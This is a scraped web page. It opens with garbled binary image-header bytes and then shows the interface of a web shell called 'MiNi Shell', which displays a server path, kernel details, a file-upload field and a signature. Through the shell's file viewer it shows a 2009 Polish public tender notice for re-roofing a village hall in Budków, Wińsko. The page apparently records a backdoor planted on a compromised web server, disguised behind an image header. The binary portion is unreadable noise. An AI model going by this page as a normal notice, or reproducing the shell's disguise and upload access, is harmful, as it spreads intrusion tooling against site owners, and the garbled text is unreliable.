JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090206/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090206/34807-N-2009.html

<p class="kh_header"><b>Wińsko: Remont dachu świtlicy w Budkowie</b><br>
<b>Numer ogłoszenia: 34807 - 2009; data zamieszczenia: 06.02.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy Wińsko , pl. Wolności 2, 56-160 Wińsko, woj. dolnośląskie, tel. 0-71 3898100 w. 29.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.winsko.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont dachu świtlicy w Budkowie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia dotyczy  wymiany pokrycia dachowego który częściowo pokryty jest  dachówką karpiówką , papą oraz płytami azbestowo-cementowymi na dach z blachy dachówko podobnej,  remontu stropu drewnianego i częściową wymianą więźby dachowej, rynien i rur spustowych. Budynku świetlicy wiejskiej w Budkowie znajduje się na dz. Nr 227. 
Wykonawca zobowiązany jest do zapoznania się ze stanem faktycznym przedmiotu zamówienia.

Zakres prac obejmuje:
- wymianę deskowania dachu i desek czołowych
- wymiana łat drewnianych w połaci dachowej
- częściowa wymiana elementów konstrukcyjnych dachu
- wykonanie izolacji paroprzepuszczalnej
- wykonanie nowego pokrycia z blachodachówki
- wymiana rynien
- wymiana rur spustowych
- wymiana obróbek blacharskich
- wykonanie daszków zabezpieczających
- impregnacja grzybobójcza elementów drewnianych więźby dachowej
- wzmocnienie stropu drewnianego
- demontaż izolacji termicznej 
- wykonane izolacji termicznej z wełny mineralnej
- demontaż podsufitki
- wykonanie stropu z płyt kartonowo-gipsowych na ruszcie metalowym

Szczegółowy zakres robót określa przedmiar robót stanowiący załącznik nr 8 do SIWZ oraz Specyfikacja techniczna załącznik nr 7  i rysunki załącznik nr 9 do SIWZ.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.26.00.00-7, 45.32.00.00-6, 45.41.00.00-4, 45.42.00.00-7.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 29.05.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. O udzielenie zamówienie mogą ubiegać się wykonawcy potwierdzający spełnienie warunków:  1.1 Posiadający uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień; 
   - prowadzą działalność gospodarczą tożsamą z przedmiotem zamówienia i posiadają aktualne   
     dokumenty, potwierdzające wymagane uprawnienia
  - nie zalegają ze składkami ZUS lub KRUS bądź uzyskali przewidziane prawem zwolnienie,  
     odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymaniu w całości wykonania decyzji  
    właściwego organu
  - nie zalegają z opłaceniem podatków i opłat bądź uzyskali przewidziane prawem zwolnienie,  
    odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymaniu w całości wykonania decyzji   
    właściwego organu
- przedstawia kserokopię aktualnej decyzji uprawniającej do wykonywania prac w zakresie  
  zabezpieczania  i usuwania wyrobów zawierających azbest na terenie powiatu wołowskiego 
  zgodnie z Rozporządzeniem Ministra Środowiska z dnia 27 kwietnia 2001r. o odpadach,( 
  Dz. U. nr 62,poz.628 z późn. zm.),  w którym znajduje się obiekt będący przedmiotem 
  zamówienia. Wykonawca do zrealizowania prac może przedstawić podwykonawcę.
  1.2 Posiadający niezbędna wiedzę i doświadczenie oraz dysponujący potencjałem technicznym i osobami zdolnymi do wykonania zamówienia; lub którzy przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia.    - wykonawcy zobowiązani są przedstawić że w okresie ostatnich pięciu lat przed dniem wszczęcia 
     postępowania o udzielenie zamówienia ,a jeżeli okres prowadzenia działalności jest krótszy- w tym  
    okresie, wykonali należycie, co najmniej 3 roboty budowlane odpowiadające swoim rodzajem 
    robotom budowlanym stanowiącym przedmiot zamówienia tj. roboty remontowe dachów, o 
    wartości każdej z robót, równej co najmniej 100 000 PLN(brutto), przedstawić referencje.
  - wykażą, że dysponują min 1 osobą posiadającą uprawnienia do kierowania robotami w specjalności  
     konstrukcyjno-budowlanej zgodnie z wymogami ustawy Prawo Budowlane, która jest wpisana na  
    listę właściwej Izby Samorządu Zawodowego oraz posiada aktualne uprawnienia.

1.3 Znajdujący się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;
 - posiadają polisę, a w przypadku jej braku inny dokument który potwierdzi, że wykonawca jest   
    ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej w  
   okresie realizacji zadania.

1.4 Nie podlegający wykluczeniu z postępowania o udzielenie zamówienia.  2. Z ubiegania się o zamówienia publicznego wyklucza się wykonawców, którzy:  2.1 nie spełniają warunków udziału w postępowaniu o zamówienie publiczne z art. 22 Prawa 
      zamówień publicznych opisanych w ppkt. 1.1 do 1.4. 2.2 podlegają  wykluczeniu z postępowania na podstawie art. 24 ust. 1 Prawa zamówień publicznych. 2.3 wykonywali bezpośrednio czynności związane z przygotowaniem prowadzonego postępowania, 
      lub posługiwali się w celu sporządzenia oferty osobami uczestniczącymi w dokonywaniu tych 
      czynności chyba, że udział tych wykonawców w postępowaniu nie utrudnia uczciwej konkurencji. 2.4 złożyli nieprawdziwe informacje mające wpływ na wynik prowadzonego postępowania.  2.5 nie złożyli oświadczenia o spełnianiu warunków udziału w postępowaniu lub dokumentów 
     potwierdzających spełnianie tych warunków lub złożone dokumenty zawierają błędy z 
     zastrzeżeniem art. 26 ust. 3 Prawa zamówień publicznych.  3. Zamawiający odrzuca ofertę jeżeli:  3.1 jest niezgodną z ustawą 3.2 jej treść nie odpowiada treści specyfikacji istotnych warunków zamówienia, z zastrzeżeniem art. 87 ust. 2 pkt. 3 Prawa zamówień publicznych. 3.3 jej złożenie stanowi czyn nieuczciwej konkurencji w rozumieniu przepisów o zwalczaniu  
      nieuczciwej konkurencji  3.4 zawiera rażąco niską cenę w stosunku do przedmiotu zamówienia,   3.5 została złożona przez wykonawcę wykluczonego z udziału w postępowaniu o udzielenie 
      zamówienia. 3.6 zawiera błędy w obliczeniu ceny  3.7 wykonawca w terminie 3 dni od dnia doręczenia zawiadomienia nie zgodził się na poprawienie 
      omyłki, o której mowa w art. 87 ust. 2 pkt. 3 Prawa zamówień publicznych  3.8 jest nieważna na podstawie odrębnych przepisów,   4. Ofertę wykonawcy wykluczonego uznaje się za odrzuconą  5. Ocena spełnienia warunków udziału w postępowaniu dokonywana będzie w oparciu o dokumenty złożone przez wykonawcę w niniejszym postępowaniu metodą warunku granicznego - spełnia/niespełna..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> A. Na ofertę składają się następujące dokumenty i załączniki:  A.1) Formularz ofertowy - wypełniony i podpisany przez wykonawcę, załącznik  nr 1 do   
       SIWZ  A.2) Wzór umowy - parafowany przez wykonawcę, załącznik  nr 2 do SIWZ 
A.3) Kosztorys ofertowy szczegółowy sporządzony na podstawie przedmiaru robót,   
        załącznik  nr 7 do SIWZ 
A.4) Oświadczenie Wykonawcy o spełnieniu warunków udziału w postępowaniu z art. 22 Prawa  
        zamówień publicznych, załącznik  nr 3 do SIWZ   

 B. W celu potwierdzenia, że wykonawca posiada uprawnienie do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 Prawa zamówień publicznych składa następujące dokumenty:   B.1) Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji 
        działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do 
        ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem 
       terminu składania ofert.   B.2) Aktualne zaświadczenie właściwego naczelnika urzędu skarbowego oraz właściwego oddziału  
       Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego 
       potwierdzające odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz  
       składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczenia, że uzyskał przewidziane 
       prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w 
       całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed  
      upływem terminu składania ofert.  
B.3) Kserokopia aktualnej decyzji uprawniającej do wykonywania prac w zakresie  
      zabezpieczania i usuwania wyrobów zawierających azbest na terenie powiatu 
      wołowskiego zgodnie z Rozporządzeniem Ministra Środowiska z dnia 27 kwietnia 2001r. 
       o odpadach,( Dz. U. nr 62,poz.628 z późn. zm.),  w którym znajduje się obiekt będący  
      przedmiotem zamówienia.
 C.W celu potwierdzenia spełnienia warunku posiadania przez wykonawcę niezbędnej wiedzy i doświadczenia oraz dysponowania potencjałem technicznym i osobami zdolnymi do wykonania zamówienia należy złożyć następujące dokumenty:   C.1) Wykaz wykonanych robót budowlanych w okresie ostatnich pięciu lat przed wszczęciem 
        niniejszego postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest 
        krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością robotom budowlanym 
       stanowiącym przedmiot zamówienia, z podaniem ich wartości oraz daty i miejsca wykonania 
       wraz z dokumentami potwierdzającymi, że roboty te zostały wykonane należycie, załącznik  nr 4 
      do SIWZ  C.2) Wykaz osób, którymi dysponuje lub będzie dysponował wykonawca i które będą uczestniczyć w 
      wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, 
      doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu 
      wykonywanych przez nie czynności, załącznik  nr 5 do SIWZ
C.3) Wykaz podwykonawców, załącznik  nr 6 do SIWZ
C.4) Pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania 
       zamówienia, jeżeli w wykazie o którym mowa w pkt.C.2 wykonawca wskazał osoby, którymi 
      będzie dysponował.    D.W celu potwierdzenia spełnienia warunku znajdowania się przez wykonawcę w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia należy złożyć następujące dokumenty:  
D.1) polisy, a w przypadku jej braku innego dokumentu potwierdzającego, że wykonawca jest  
       ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1"><br>
<li>1 - Cena - 90</li>
<li>2 - okres gwarancji - 10</li>
</ul><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bip.winsko.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Wińsko
pl. Wolności 2
56-160 Wińsko
pokój 18.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.03.2009 godzina 12:00, miejsce: Urząd Gminy Wińsko
pl. Wolności 2
56-160 Wińsko
pokój 9.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com